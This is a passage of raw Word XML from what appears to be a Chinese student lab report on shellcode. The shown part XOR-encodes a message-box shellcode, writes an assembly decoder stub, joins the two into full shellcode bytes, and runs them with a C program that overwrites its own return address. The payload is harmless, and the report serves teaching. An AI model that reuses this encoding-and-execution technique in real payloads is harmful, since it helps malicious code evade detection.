</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"\x33\xDB\x53\x68\x72\x6C\x64\x20\x68\x6F\x20\x77\x6F\x68\x68\x65\x6C\x6C\x8</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B\xC4\x53\x50\x50\x53\xB8\xEA\x07\xD5\x77\xFF\xD0\x90";</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encoder(sc, 0x44);</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getchar();</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return 0;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="3158490"/>
            <wp:effectExtent l="0" t="0" r="1016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3158490"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>然后去找到文件位置的名字叫encode的txt文件，打开，里面就是加密后的shellcode，\x77\x9f\x17\x2c\x36\x28\x20\x64\x2c\x2b\x64\x33\x2b\x2c\x2c\x21\x28\x28\xcf\x80\x17\x14\x14\x17\xfc\xae\x43\x91\x33\xbb\x94\xd4。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="200" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>产生含有解码程序的shellcode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    程序如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">#include &lt;stdlib.h&gt;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#include &lt;string.h&gt;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#include &lt;stdio.h&gt;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int main()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__asm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call lable;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lable: pop eax;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add eax, 0x15 ;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">越过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">decoder </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">记录 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">shellcode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">起始地址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xor ecx, ecx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decode_loop:mov bl, [eax + ecx]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xor bl, 0x44 ;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">0x44 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">作为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">key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mov [eax + ecx], bl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inc ecx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cmp bl, 0x90 ;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">末尾放一个 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">0x90 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">作为结束符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jne decode_loop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 xml:space="preserve">return 0; </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>然后根据程序提取出含有解码程序的shellcode，方法类似上文中获取弹出“hello world”窗口的shellcode。对应机器码的指令地址从0x00401038到0x00401051，截图如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="3158490"/>
            <wp:effectExtent l="0" t="0" r="1016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6690" cy="3158490"/>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获得含有解码程序的shellcode是：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>\xE8\x00\x00\x00\x00\x58\x83\xC0\x15\x33\xC9\x8A\x1C\x08\x80\xF3\x44\x88\x1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>C\x08\x41\x80\xFB\x90\x75\xF1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4.链接两段机器码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>后，得到完整 shellcode 如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>\xE8\x00\x00\x00\x00\x58\x83\xC0\x15\x33\xC9\x8A\x1C\x08\x80\xF3\x44\x88\x1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>C\x08\x41\x80\xFB\x90\x75\xF1\x77\x9f\x17\x2c\x36\x28\x20\x64\x2c\x2b\x64\x33\x2b\x2c\x2c\x21\x28\x28\xcf\x80\x17\x14\x14\x17\xfc\xae\x43\x91\x33\xbb\x94\xd4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>利用如下程序进行验证：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>#include &lt;windows.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>char ourshellcode[]="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>\xE8\x00\x00\x00\x00\x58\x83\xC0\x15\x33\xC9\x8A\x1C\x08\x80\xF3\x44\x88\x1C\x08\x41\x80\xFB\x90\x75\xF1\x77\x9f\x17\x2c\x36\x28\x20\x64\x2c\x2b\x64\x33\x2b\x2c\x2c\x21\x28\x28\xcf\x80\x17\x14\x14\x17\xfc\xae\x43\x91\x33\xbb\x94\xd4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>void main()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>LoadLibrary("user32.dll");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>int *ret;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ret=(int*)&amp;ret+2;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>(*ret)=(int)ourshellcode;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>return;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>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结果如下：（成功实现目标功能）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="3158490"/>
            <wp:effectExtent l="0" t="0" r="1016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690" cy="3158490"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>心得体会</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>对汇编代码有进一步了解，比如在平时不常见到的xor指令</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>对shellcode代码原理进一步了解，对于生成原理，作用原理有更深刻的认识。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>对shell code攻击有了一定的理解，攻击原理和攻击模式有了更深刻的认识。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>对加密原理也有了更深刻的认识，同时也增加了利用异或加密的实践经验。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>整体原理：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="840" w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>通过书写一些可执行的代码，转换为对应2进制机器码</w:t>
      </w:r>
